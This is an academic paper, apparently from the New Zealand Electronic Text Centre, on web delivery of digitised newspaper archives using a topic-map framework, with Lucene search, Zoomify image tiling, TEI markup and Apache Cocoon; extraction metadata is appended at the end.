As regards the forms of content to be delivered over the web from a newspaper archive, a key question is whether to provide users with access to the transcribed text of the newspaper, to images of the original printed newspaper, or to both? Delivering both forms of content has several advantages. The images enable access to content which cannot be transcribed such as photographs, illustrations and complex diagrams. They also provide information through visual details such as the size of headline, the style of font, or design of page layout which is not conveyed by the transcribed text. The transcribed text itself can be usefully provided to users because, in addition to providing the raw material for full text searches, in most cases it will be more legible than the original. As text it is also more malleable than an image in that the presentation can be altered to fit users' needs by altering font sizes, page layout and other variables. In some projects there may be an additional requirement to provide user access to source images as distinct from access images. Consideration is also needed of what tools and mechanisms will be provided to enable users to engage with and use the content.

---

1 New Zealand Electronic Text Centre
Tools, for example, to zoom in and out of access images; to provide a version of each newspaper page suitable for printing; to send a URL, page or image to an email address; to downloading or print an entire newspaper issue; to downloading metadata records (e.g. for inclusion in a reference management system like Endnote). It is often the case that a newspaper archive will be incomplete, that there will be missing issues from a publication or missing pages from a particular issue. There may also be printing anomalies in newspaper pages such as incorrect page numbers and incorrect dates. A newspapers delivery system needs to be able to handle such cases, make omissions visible to users and support metadata describing printing anomalies which can also be made visible to users. The granularity of access provided is an interesting question. Should users be able to navigate or search to the level of a newspaper page, or to the individual articles on those pages? This is an area in which the delivery system is almost wholly dependant on decisions made during the digitisation process. If article-level access images and mark-up have not been created the delivery system can only operate at the page level. In general, it is more challenging to define articles within newspapers than to define structural sub-units of journals and monographs. In most journals, the articles are easily identified as distinct units within the whole. Chapters serve that function for books. Smaller pamphlets are typically treated as a whole, without sub-units. When both commercial publishers of historic newspapers, as well as institutions such as the British Library, poll user groups to find out whether users prefer working with page-level or article-level files, the overwhelming response is that the preference is for article-level access. Users certainly want the ability to view an entire page, but most users seem to find that navigating from a hit list of relevant article citations directly to the article itself makes for a more efficient and satisfying user experience. The USA's Library of Congress (LOC) is currently in the midst of a project to create a test bed of digitized newspapers for its National Digital Newspaper Program (NDNP), the specifications for which are page-level files. Nevertheless, many of the US State Libraries which are doing the digitization of the issues coming from their own collections are creating two sets of digitized objects: issue-level files for delivery to the LOC and also a set of article-level files for themselves, since the state-level editorial boards selecting the titles for conversion requested them. While it remains to be seen what the LOC will ultimately specify once the test bed is created and users have weighed-in on the results, the vast majority of other institutions involved with digitizing significant quantities of newspaper content are adopting article-based models over page-based models. When we consider the modes of access to be provided, we are asking what search facilities will be presented to the user, what browsing methods will be enabled? Where an article-based model has been adopted during the digitisation process then the delivery system should make the most of this source material and allow navigation straight to a given article as well as between articles on the same page or in the same issue, and from page to page and issue to issue. 
Browsing by newspaper or article title, by date, by geographic region, by author, by subject or by any other item of metadata may be appropriate. Ideally simple full text searching of all newspapers should be available as well as a separate "advanced" search interface which includes support for fielded searching of selected metadata fields; standard Boolean search operators, phrase queries, wildcard queries and proximity operators. Allowing searches to be limited by date, publication, or other metadata fields (e.g. newspaper category, article type) would further increase functionality. Finally, as regards modes of access, there is a need to develop support for access by other systems through interoperability tools and protocols such as OpenURL\(^2\), OAI-PMH\(^3\) and SRU / SRW\(^4\). At the NZETC we feel strongly that the systems should conform to relevant public guidelines, specifications and standards where possible to achieve a high level of modularity of the system architecture and to facilitate broad interoperability.

Extensibility is the degree to which the system will enable the inclusion, not only of other resources and data types, but also of metadata from other sources so as to enhance existing content. Customization is the extent to which the interface is customizable, both by the institution maintaining the archive (e.g. to meet branding guidelines) and by the user. For a user this might mean a 'MyNewspaperArchive' approach which could allow users to use personalised features, such as personal preferences, favourite newspaper titles, saved pages, saved search result sets. Finally, usability and performance cover a range of issues such as what range of browsers will be supported? What level of context sensitive help will be provided? Will the system meet W3C accessibility guidelines? What performance requirements must be met?

The NZETC Topic Map Presentation Framework

These were the challenges facing the NZETC when we started to develop the Topic Map Presentation Framework (TMPF) for newspaper delivery. The work was prompted by the actions of the National Library of New Zealand and the National Library of Australia, both of whom issued, in 2005, public requests for proposals to provide online access to their existing newspaper archives. In response to these requests the NZETC started working with APEX CoVantage to explore what could be achieved by combining experience in developing semantic navigation frameworks at the NZETC with the newspaper digitisation expertise at APEX. This section will describe some of the salient features of the TMPF before describing the example newspaper delivery system built using the TMPF.

The TMPF in production at the NZETC is a dynamically-generated semantic framework – a metadata repository implemented using the ISO Topic Map standard instead of the more usual implementation based directly on a relational database. The topic map metadata repository provides the system with an unusually flexible and open-ended conceptual structure. This has a number of benefits, including greatly simplifying the integration of disparate information systems and facilitating the presentation of contextually rich web pages. Users are able to move around the resources on the site tracking topics of interest rather than merely browsing the material linearly or through text searching.

---

2 OpenURL is ANSI/NISO Standard Z39.88-2004

3 The Open Archives Initiative Protocol for Metadata Harvesting

4 Library of Congress standard for web services for search and retrieval based on Z39.50 semantics
In a topic map, web-based resources are grouped around items called “topics”, each of which represents some subject of interest. In the NZETC topic map, the topics represent books, chapters, and illustrations, and also people and places mentioned in those books. Topics in a topic map are linked together with hyperlinks called “associations”. There can be different types of association in a topic map, representing the different kinds of relationship in the real world. For instance, in the NZETC topic map, the topic which represents a particular person may be linked to a topic which represents a chapter of a book which mentions that person. This association would be labelled to indicate that it represents a "mention". Similarly, the same person's topic might be linked to a particular photograph topic, via a "depiction" association. This identification and codification of topics and associations is essentially the act of creating an ontology. Modelling domain relationships requires a sophisticated analysis of real work entities, a difficult and time consuming task. We have therefore taken advantage of the seven year effort by the CIDOC Conceptual Reference Model group to create a high-level ontology known as the CIDOC CRM. This ontology was designed to enable information integration for cultural heritage data and their correlation with library and archive information. The NZETC has based the semantics of the TMPF on the event-based model of the CIDOC CRM as illustrated below. --- 5 W3C Recommendation on making web content accessible to people with disabilities. http://www.w3.org/TR/WAI-WEBCONTENT/ 6 CIDOC CRM http://cidoc.ics.forth.gr/ This allows us to express relationships such as those illustrated in the diagram below. The central topic, Te Rangihaeata, was a chief of the Ngati Toa. In the topic map, the topic which represents him is associated with three other topics, each of which has an occurrence. The association on the left represents a depiction of Te Rangihaeata. The picture which depicts him is “Figure 85” from a book by Elsdon Best called “The Maori as he was”. On the right, “Textiles, Clothing, and Ornaments” is a chapter from the same text, which mentions him. Both of these associations were of course harvested from the XML file containing the Elsdon Best book. In the centre, Te Rangihaeata is associated with a web page on the website of the Dictionary of New Zealand Biography. This last piece of information was harvested from our name list. Note that the central topic “Te Rangihaeata” was harvested twice – once from the Elsdon Best book, and once from the names list. But these two topics merged together automatically, leaving us with just one topic with 3 associations. To construct our topic map, we use XSLT\(^7\) stylesheets to extract metadata from each of our XML text files, and express it in the XTM\(^8\) format. In this way we automatically create hundreds of topic maps, each of which describes one of our texts. We also harvest information about people, places and organisations from a MADS\(^9\) authority file which we construct from what is mentioned in our collection. Finally we merge the harvested topic maps together to create a unified topic map which describes our entire website. By harvesting not only bibliographic metadata but also references to people, organisations and places, the site provides individual pages for topics of interest, linked automatically to those places they are mentioned or illustrated. 
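To make the merging behaviour concrete, here is a minimal sketch, in Python rather than XTM, of how topics harvested from different sources can merge when they share a subject identifier, with their associations accumulating on the merged topic. The identifiers, relation names and data below are hypothetical, and the real TMPF performs this merging on XTM topic maps rather than Python dictionaries.

```python
# Minimal sketch of topic merging: topics from different harvested maps merge
# when they share a subject identifier, and their associations accumulate.

def merge_topic_maps(*maps):
    merged = {}
    for tm in maps:
        for subject_id, topic in tm.items():
            entry = merged.setdefault(subject_id, {"names": set(), "associations": []})
            entry["names"].update(topic.get("names", []))
            entry["associations"].extend(topic.get("associations", []))
    return merged

# Harvested from an encoded text (hypothetical identifiers and labels):
from_text = {
    "person/te-rangihaeata": {
        "names": {"Te Rangihaeata"},
        "associations": [("depicted_in", "best-maori/figure-85"),
                         ("mentioned_in", "best-maori/textiles-chapter")],
    }
}
# Harvested from an authority file:
from_authority = {
    "person/te-rangihaeata": {
        "names": {"Te Rangihaeata"},
        "associations": [("described_by", "dnzb/te-rangihaeata")],
    }
}

merged = merge_topic_maps(from_text, from_authority)
print(len(merged))                                            # 1: the two topics merged
print(len(merged["person/te-rangihaeata"]["associations"]))   # 3 accumulated associations
```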
Being automatically generated from the source XML files, maintenance is simple and the number and types of topics linked to can be increased simply by adding extra mark-up to the texts. Each page on the website represents one of these topics, along with any associated topics. The screenshot below is the page for Te Rangihaeata.

Figure 3: Screenshot from NZETC Collection

The topic map manages all the hyperlinks, bibliographic metadata, structural metadata, annotations, classifications, name authorities and glossaries for the entire website. By extracting all the metadata needed from every resource available and merging it all together in the topic map, it is ensured that all relevant information is prepared and readily available to

---

\(^7\) W3C specification for the syntax and semantics of a language for transforming XML documents into other XML documents [http://www.w3.org/TR/xslt](http://www.w3.org/TR/xslt)

\(^8\) XML Topic Maps [http://www.topicmaps.org/xtm/](http://www.topicmaps.org/xtm/)

Figure 4: Screenshot from NZETC website, showing an excerpt of an encoded pamphlet in which a mention of Sir George Grey is hyperlinked. http://www.nzetc.org/tm/scholarly/tei-HadOneOtt-body.html#name-208095-1

The hyperlink pointing to the page about Grey has a tool tip (an HTML title attribute) saying "Sir George Grey. Soldier, explorer, colonial governor, premier, scholar." This tool tip was drawn not from the encoded text of the pamphlet but from a record about George Grey in an authority file. When the authority file was imported into the topic map, a topic was created to represent George Grey, and this topic was merged with all the references to George Grey in the encoded texts, so that every hyperlink on the website which points to the George Grey page now has the same "authoritative" tool tip.

TMPF makes use of a number of public guidelines, specifications and standards, as listed in the table below.
<table>
<thead>
<tr>
<th>Purpose</th>
<th>Specification</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td>Encoding (general)</td>
<td>XML</td>
<td><a href="http://www.w3.org/TR/REC-xml/">http://www.w3.org/TR/REC-xml/</a></td>
</tr>
<tr>
<td>Addressing</td>
<td>URI</td>
<td><a href="http://www.w3.org/Addressing/">http://www.w3.org/Addressing/</a></td>
</tr>
<tr>
<td>Text encoding</td>
<td>TEI</td>
<td><a href="http://www.tei-c.org/Guidelines2/">http://www.tei-c.org/Guidelines2/</a></td>
</tr>
<tr>
<td>OCR encoding (under development)</td>
<td>ALTO</td>
<td><a href="http://www.loc.gov/ndnp/techspecs.html">http://www.loc.gov/ndnp/techspecs.html</a></td>
</tr>
<tr>
<td>Authority control</td>
<td>MADS</td>
<td><a href="http://www.loc.gov/standards/mads/">http://www.loc.gov/standards/mads/</a></td>
</tr>
<tr>
<td>Transformation of XML source materials into presentation formats</td>
<td>XSLT</td>
<td><a href="http://www.w3.org/TR/xslt">http://www.w3.org/TR/xslt</a></td>
</tr>
<tr>
<td>Presentation</td>
<td>HTML</td>
<td><a href="http://www.w3.org/MarkUp/">http://www.w3.org/MarkUp/</a></td>
</tr>
<tr>
<td>Page formatting</td>
<td>CSS</td>
<td><a href="http://www.w3.org/Style/CSS/">http://www.w3.org/Style/CSS/</a></td>
</tr>
<tr>
<td>Image processing</td>
<td>SVG</td>
<td><a href="http://www.w3.org/Graphics/SVG/">http://www.w3.org/Graphics/SVG/</a></td>
</tr>
</tbody>
</table>

Using the TMPF for Newspaper Delivery

When the NZETC started to work with APEX to use the TMPF as a newspaper delivery system, we created two small demonstration sites for the National Library of Australia and the National Library of New Zealand using content from their newspaper archives. The Australian site has 7413 web pages, including 204 issues, consisting of 847 newspaper pages and 6362 articles. The New Zealand site is about half that size. The creation of these demonstration sites was work undertaken at the NZETC and APEX to explore how well the Topic Map system worked with newspaper content and does not represent any decision by either National Library to use this technology. The NZETC is just one of many respondents to the RFPs issued by the libraries. The use of the TMPF to deliver example content from the two libraries on these demonstration sites is not indicative of any technology or vendor choices or decisions made by either library. The two demonstration sites are not available to the public.

The APEX Intelligent Zoning and Algorithmic Conversion (IZAAC) process was used to convert digital images of the newspapers into XML encoded text\(^{10}\). In APEX’s process, an Article is defined as a “complete newspaper story.” This concept is extended to a number of newspaper elements, including small, continuous units of like content, such as news briefs and classified advertisements, and stand-alone features, such as photographs, illustrations, and crossword puzzles. The IZAAC process relies on human cognition to identify and zone articles, rather than relying on an automated process. Automated approaches are adequate for extremely simple layouts and standardized formats, but when applied to newspapers the results are usually unacceptable. Logical analysis alone cannot recognize discontinuous portions of an Article even on the same page, let alone across pages. Perhaps for this reason, many commercial software packages that rely on automated article definition use proxy terms for Articles, such as “chunks”. Chunks can miss portions of an Article or may overlap across Articles.
Neither is acceptable from a user-experience perspective. Illustrations that are part of an Article are included with the Article. Illustrations that do not have associated text are treated as separate Articles. Captions are included with the illustrations and are tagged as such, supporting searches by caption. Articles are always associated with the page on which they appear. The availability of article-level metadata and more accurate OCR text output greatly increases the points of access into the collection which the TMPF can provide to users.

The newspaper demonstration sites provide access both to the access images and to the transcribed text. They also give users the option to hide the transcribed text if they are only interested in viewing the images. The TMPF for newspaper delivery supports browsing of the full list of newspaper titles by title and by date. Users can browse within a selected newspaper issue and navigate from page to page, from any page to the first page of the issue, from any page to the issue web page, and from any page to the publication web page. Users can also browse from article to article on a given page or in a given issue. This is enabled through a topic map which includes topics for a newspaper series (e.g. “The Times”), a newspaper issue (e.g. “The Times 18th June 1942”), pages, articles, article images, publishers and dates. As with the TMPF used in production for the NZETC collection, this very simple ontology for the newspaper domain is encoded as an extension of the much more complex and sophisticated CIDOC CRM.

In the near future we expect to include support for browsing the issues of a selected newspaper by date through an interface similar to calendar pages, and for browsing by geographic region of newspaper coverage. TMPF already harvests publication date information in its topic map, including relating the dates to a calendar of years, decades, and centuries. Exposing these date topics for browsing will require only minor additions to the user interface layer. Although TMPF already includes publication place information in its topic map, this is not quite the same as geographic coverage. However, only minor development work would be required to harvest geographic coverage from newspaper source files and present a browsable user interface, including a clickable map of New Zealand. In fact, because TMPF uses a topic map to define browse points, any and all metadata harvested into the topic map (whether from the newspaper source materials or from external data sources) can be used as the basis for browsing the newspaper collection.

To enable users to view the access images of the newspaper pages and articles we used “Zoomify” technology to provide zooming and panning functionality. The free Zoomify EZ encoder creates multiple copies of an image at multiple resolution tiers, from the original source resolution down to a thumbnail. Each tier is then cut into many small tiles. All the tiles from all the tiers are combined into a folder of JPEG files with an index of the exact location of every tile. Tile organization is pyramidal in that tiles are stacked from a thumbnail down to the highest resolution, tier upon tier. When the converted image is viewed, the Zoomify Flash Viewer requests tiles from the appropriate tier to fill the display area. Each zoom and pan requests only a small additional number of tiles: those at the level of zoom desired or for the part of the image panned to. These additional tiles are streamed on demand to the viewer; no tiles are ever delivered unless required for the current display, or for a display that is anticipated to immediately follow (intelligent pre-fetching).

\(^{10}\) Although the TMPF used to deliver the NZETC collection …
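As a small illustration of what the encoder produces (the figures below are invented, and the layout described is typical of Zoomify output rather than taken from the demonstration sites), each converted image is accompanied by JPEG tiles grouped into TileGroup folders and a short XML descriptor from which the viewer calculates the tile grid for every tier:

```xml
<!-- ImageProperties.xml: illustrative Zoomify descriptor for one converted page.
     WIDTH and HEIGHT are the pixel dimensions of the source image and TILESIZE
     the tile edge length; the viewer derives the number of tiers and the rows
     and columns of each tier from these values. Tiles are JPEG files typically
     named tier-column-row.jpg, e.g. TileGroup0/0-0-0.jpg for the thumbnail tier.
     All values here are invented for illustration. -->
<IMAGE_PROPERTIES WIDTH="4096" HEIGHT="4096" NUMTILES="341"
                  NUMIMAGES="1" VERSION="1.8" TILESIZE="256" />
```

For this invented 4096 × 4096 pixel page, the pyramid works out at five 256-pixel tiers (16 × 16, 8 × 8, 4 × 4, 2 × 2 and 1 × 1 tiles), so a zoom into one corner of the page touches only a handful of the 341 tiles rather than the full-resolution image.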
Figure 5 Pyramidal tiled multi-resolution image from the Zoomify process. Taken from http://www.zoomify.com

As the screenshot below shows, the user has the ability to zoom in and out of the image, and to pan left, right, up and down around a page or an article. The thumbnail in the top left hand corner is a further navigational aid in that it informs the user of the location of their current view.

To enable searching over the newspaper archive we used the Apache Lucene\(^{11}\) search engine, again as we do for the TMPF in production at the NZETC. It provides all the search functionality discussed in the “Delivering Newspaper Content” section above, including an optional module for synonym expansion in search queries using the WordNet thesaurus. Users can limit their search to a particular newspaper title and/or by a date range.

[Search form: search words or phrases; results per page; optional restriction by title, date of publication (YYYYMMDD) range, and serial]

Search results are displayed as a list of links to relevant resources, with large result sets split across several pages. The user can set the number of results displayed on each query result screen, and navigate easily between result screens. Result pages are also bookmarkable. The Lucene search engine uses a sophisticated relevance ranking algorithm to sort results. Article titles and other important or quality-assured metadata can be boosted in importance when building the Lucene search index, so that Lucene accords hits on these fields a greater weight. Lucene’s query syntax also allows users to boost the priority of individual words or phrases in their queries, so that documents containing those terms are regarded as more relevant than those containing only unboosted terms.

Background information describing the history of each newspaper can be included on the appropriate publication web page. Such a background article can be written either directly in HTML or in XML. Such an article is linked to the newspaper it describes by using the persistent identifier of the newspaper as the subject of the article, in the article’s metadata header. It is important to note that the exact same technique can also be used to associate background information with individual newspaper issues, pages, or articles.

When missing pages or printing anomalies are encountered in the source material, the TMPF system handles different types of omissions in different ways. If there is a story behind the omission, this story can be encoded as another text and linked to an appropriate part of the collection: the newspaper series, individual issue, article or page. TMPF would then include and display this explanatory material in the appropriate context. Alternatively, where content is missing from inside a document, the omission may be encoded using appropriate XML markup in the source material (such as the <gap> element in the TEI mark-up language) to describe the missing content or explain the omission. Where entire issues are missing, XML files empty of content can be used as placeholders for the missing material.

\(^{11}\) Apache Lucene [http://lucene.apache.org/java/docs/index.html](http://lucene.apache.org/java/docs/index.html)
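As a hedged illustration of this in-document approach (the <gap> element is TEI's, but the attribute values and the surrounding article text are invented for this example), a damaged passage inside an article might be encoded as:

```xml
<!-- Illustrative TEI fragment only: records a known omission in the transcribed
     article text. The reason and extent values are invented examples, not NZETC
     or library encoding policy. -->
<p>The meeting resolved to petition the Governor
  <gap reason="damage" extent="2 lines"/>
  and the motion was carried without dissent.</p>
```

Because the omission is recorded in the encoded text itself, the explanation travels with the article wherever it is displayed.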
Errors and anomalies in the source materials can be explicitly marked as anomalies using appropriate XML mark-up, such as the <sic> and <corr> elements in the TEI mark-up language.

The TMPF approach means a wide range of textual materials can be included in the delivery system, such as journals and monographs (e.g. pamphlets). TMPF is currently used by the NZETC to present its digital collection, which includes books, journals, letters, and pamphlets. TMPF is fully extensible to handle an open-ended variety of materials. Different document types can be presented in distinct ways, or, to the extent that they can be interpreted in terms of a common conceptual model, they can be presented in an identical fashion, to provide a consistent user experience regardless of the different document formats, encoding practices, and storage technologies. TMPF is designed to be easily extensible to other data types, metadata schemas, and knowledge domains.

The use of a topic map for the central metadata repository in TMPF provides an open-ended framework for importing, mapping and meaningfully presenting information from a number of distinct information systems. TMPF can import and merge pre-existing metadata from other sources. The NZETC has used TMPF to import metadata records from other sources and merge them with metadata describing TMPF’s own collection. To import and merge metadata from external sources, the metadata is first exported in some XML format; an XSLT transformation then extracts it into the common XML Topic Map (XTM) format, which is imported and merged. Merging of metadata records in general requires only that items of interest can be identified by a URI. For newspapers this might be an ISSN, DOI, URN, or simply an HTTP URL. The topic map metadata repository in TMPF can record mappings between different name authorities and perform cross-walks between sets of metadata using those authorities. All metadata records for resources with a particular identifier are automatically merged. Merging behaviour is a key part of the specification of the Topic Map standard and is a built-in feature of the topic map metadata repository component of TMPF.

In general, ease of use is the result of a well thought-out and robust system architecture that lies beneath the interface. This is a characteristic of TMPF, which provides a fully customisable interface giving complete control over the delivery system’s look and feel. In designing the interface of TMPF for newspaper delivery we aimed for something which is uncluttered, requires minimal keying and clicking, and minimal opening of new windows. TMPF accommodates context-sensitive help by assigning help documentation to any topic in the system. Help can be authored as one or more XML documents and linked to the relevant part of the system by adding subject classification metadata (i.e. the help document is itself tagged as being “about” a class of topic, such as monthly publication histories, newspaper issues, articles, pages, etc.).

TMPF allows regular web browser features to work as users expect. TMPF does not encode session identifiers in URLs, which is a common obstacle to bookmarking. In TMPF, the URLs of web pages are entirely independent of the storage and retrieval mechanism for content. TMPF can be configured to use web page URLs conforming to any desired convention. Other potential obstacles to regular navigation involve client-side JavaScript for linking and the use of frames and pop-up windows.
Though TMPF does not prevent the use of these techniques, they have not been used in TMPF and are not generally recommended. The TMPF interface is completely customisable and supports integration of links to other services. Such links may also be classified into different types (e.g. “further reading,” “discussion forums,” “annotations,” etc.), and each type of link presented independently. These links may be further classified in various ways:

- by access/visibility (e.g. “public,” “internal,” “QA”)
- by perspective (e.g. “historical,” “geographical”)
- by provenance (e.g. “scholarly,” “user-contributed,” “Te Puna,” “Te Papa,” “Ministry of Culture and Heritage”)
- by natural language (e.g. “English,” “Māori”)

Multiple user interfaces can present filtered views of these links appropriate for particular audiences. TMPF is built out of XML-based components; hence it is based entirely on Unicode. This provides the ability to represent all characters in Māori and other Polynesian languages.

As for our TMPF production system at the NZETC, we used Apache Cocoon to transform the XML texts created by APEX into readable documents using XSLT stylesheets. Cocoon can deliver documents in a variety of formats, including HTML, PDF, RTF, SVG, JPEG, PNG, and other XML-based formats. We can also integrate software to produce Microsoft’s eBook Reader format. Cocoon can perform these transformations on demand, i.e. when a request is received from a web browser. Each request is handled by reading the appropriate XML document or documents, and processing the XML data in a succession of stages, first applying logical, then presentational transformations. Each stage is distinct and can be effectively managed by different people. Our web designer can edit the look of the site, the web developer can edit the structure of the site, and the text-editors can edit the content of the site (the e-texts), all independently of each other.

To install a new text, the editors can simply upload the XML document and associated image files onto the webserver via FTP. The document will then be automatically converted to HTML and divided into separate pages for each chapter, and scaled-down thumbnail versions of the JPEG graphics will be created using the XML graphics format SVG. To change the overall look of the site, the web-designer can upload new design elements such as CSS stylesheets, new versions of the logo, navigation menu, etc., in the same way. When a document is displayed to the reader, the content will be automatically inserted into this new design. Apache Cocoon is a Java servlet and hence it can be deployed on a wide variety of systems. At the NZETC we run Cocoon inside the Apache Tomcat servlet container (the official reference implementation for the Java Servlet specification), using JVM version 1.4 from Sun Microsystems.

Conclusion

There are currently numerous large projects going on around the world which aim to create online newspaper archives. So far, much of the public, technical discussion around these projects has focused on the digitisation process – the use of microfilm for scanning, OCR requirements and techniques, file naming conventions, image format choices, storage strategies, and so on. Since the imperative for digitisation is often as much about preservation as it is about access, this is not surprising.
However, the delivery of content from the newspaper archive to users is a similarly important process, which requires a similar level of commitment to technical research and development if it is to be successful. Of course the successful delivery of newspaper content over the web is predicated on the existence of a high-quality, well-structured digital collection to deliver. No amount of sophisticated search algorithms, novel browsing functionality or intuitive interface design can compensate for inaccurately transcribed text, poor-quality images or inaccurate metadata. But it is equally true that the impact and usefulness of even the most interesting, high-quality content will be diminished if that content is not discoverable, navigable and presented in a way that meets user needs.

The TMPF has been developed within academic communities and has not enjoyed the benefits of high-level marketing and promotional efforts. However, the semantic framework that it applies to the newspaper domain presents a possible means to fulfil some of the complex requirements which must be met to ensure the successful online delivery of a newspaper archive.
{"Source-Url": "http://researcharchive.vuw.ac.nz/bitstream/handle/10063/63/paper.pdf?sequence=2", "len_cl100k_base": 7118, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 33206, "total-output-tokens": 7430, "length": "2e12", "weborganizer": {"__label__adult": 0.00036406517028808594, "__label__art_design": 0.0026950836181640625, "__label__crime_law": 0.0007352828979492188, "__label__education_jobs": 0.012451171875, "__label__entertainment": 0.0006499290466308594, "__label__fashion_beauty": 0.00028705596923828125, "__label__finance_business": 0.001773834228515625, "__label__food_dining": 0.00048661231994628906, "__label__games": 0.0006155967712402344, "__label__hardware": 0.0021724700927734375, "__label__health": 0.0004320144653320313, "__label__history": 0.004245758056640625, "__label__home_hobbies": 0.00025916099548339844, "__label__industrial": 0.0006566047668457031, "__label__literature": 0.0031414031982421875, "__label__politics": 0.0007257461547851562, "__label__religion": 0.0006031990051269531, "__label__science_tech": 0.1817626953125, "__label__social_life": 0.00033283233642578125, "__label__software": 0.37451171875, "__label__software_dev": 0.40966796875, "__label__sports_fitness": 0.00025725364685058594, "__label__transportation": 0.0008025169372558594, "__label__travel": 0.00052642822265625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35047, 0.0072]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35047, 0.42095]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35047, 0.92773]], "google_gemma-3-12b-it_contains_pii": [[0, 3270, false], [3270, 8009, null], [8009, 11996, null], [11996, 13066, null], [13066, 15159, null], [15159, 17825, null], [17825, 21071, null], [21071, 24156, null], [24156, 24717, null], [24717, 27733, null], [27733, 31891, null], [31891, 35047, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3270, true], [3270, 8009, null], [8009, 11996, null], [11996, 13066, null], [13066, 15159, null], [15159, 17825, null], [17825, 21071, null], [21071, 24156, null], [24156, 24717, null], [24717, 27733, null], [27733, 31891, null], [31891, 35047, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35047, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35047, null]], "pdf_page_numbers": [[0, 3270, 1], [3270, 8009, 2], [8009, 11996, 3], [11996, 13066, 4], [13066, 15159, 5], [15159, 17825, 6], [17825, 21071, 7], [21071, 24156, 8], [24156, 24717, 9], [24717, 27733, 10], [27733, 31891, 11], [31891, 35047, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35047, 0.11579]]}
olmocr_science_pdfs
2024-12-11
2024-12-11